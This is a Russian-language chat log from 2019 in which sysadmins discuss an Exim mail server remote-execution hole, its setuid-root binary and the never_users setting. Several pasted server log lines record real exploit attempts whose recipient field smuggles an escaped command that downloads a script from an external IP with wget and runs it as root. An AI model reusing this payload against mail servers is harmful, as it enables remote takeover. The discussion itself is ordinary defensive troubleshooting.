AI
счастье, что у меня haraka, если чего и пропишут, то из докер контейнера с ограниченным пользователемо но не вылезет...
Size: a a a
2019 June 10
D
счастье, что у меня haraka, если чего и пропишут, то из докер контейнера с ограниченным пользователемо но не вылезет...
У меня тоже в дыркере, но это не отменяет массового дизлайка exim. Может наконец перейдут на Postfix/Haraka или гошные альтернативы.
2019 June 11
R
Мне вот все-таки категорически интересно, почему в случае с конкретно этой уязвимостью все бросились проклинать exim, а не свои кривые конфиги или нежелание следить за софтом?
Лог с сервака клиента, 4.91, настраивался чёрти когда:
Лог с сервака клиента, 4.91, настраивался чёрти когда:
2019-06-10 05:21:13 H=(server.***.ru) [89.248
.171.57] F=<> rejected RCPT <${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2eyimrv\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyimrv\x20\x2dn\x22\x20\x26}}@server.***.ru>: relay not permitted
2019-06-10 05:21:13 H=(server.***.ru) [89.248.171.57] F=<> rejected RCPT <root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2eyimrv\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyimrv\x20\x2dn\x22\x20\x26}}@server.***.ru>: relay not permitted
2019-06-10 05:21:13 H=(server.***.ru) [89.248.171.57] F=<> rejected RCPT <bin+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2eyimrv\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyimrv\x20\x2dn\x22\x20\x26}}@server.***.ru>: relay not permitted
R
Записей куча, сервак цел и невредим
+
ну ты разобрался. почему он цел?
+
релей нот пермитед, потому что наверно домен не совпадает
+
если правильно вписать домен, то всё ок будет
+
Лучше подскажите, а каким фигом эта rce даёт возможность запускать команду под root, если exim работает под юзером exim?
R
+_-
если правильно вписать домен, то всё ок будет
будет "User doesn't exists")
+
У тебя нет пользователя рут на системе?
+
+_-
Лучше подскажите, а каким фигом эта rce даёт возможность запускать команду под root, если exim работает под юзером exim?
> ls -lah /usr/sbin/sendmail.exim
lrwxrwxrwx. 1 root root 4 Jun 10 11:32 /usr/sbin/sendmail.exim -> exim
lrwxrwxrwx. 1 root root 4 Jun 10 11:32 /usr/sbin/sendmail.exim -> exim
+
n> ls -lah /usr/sbin/exim
-rwsr-xr-x. 1 root root 1.4M Jun 5 12:22 /usr/sbin/exim
-rwsr-xr-x. 1 root root 1.4M Jun 5 12:22 /usr/sbin/exim
+
ясно
R
+_-
У тебя нет пользователя рут на системе?
never_users = root
+
хм, у меня тоже так)
+
это с коробки?
R
+_-
Лучше подскажите, а каким фигом эта rce даёт возможность запускать команду под root, если exim работает под юзером exim?
потому, что exim работает под разными пользователями, когда обслуживает кучу локальных юзерей с мейлдирами в /home/$USER и он ДОЛЖЕН смочь положить туда письмо.
+
потому, что exim работает под разными пользователями, когда обслуживает кучу локальных юзерей с мейлдирами в /home/$USER и он ДОЛЖЕН смочь положить туда письмо.
это я понимаю, я хотел понять как это реализовано с точки зрения линукс
+
нашёл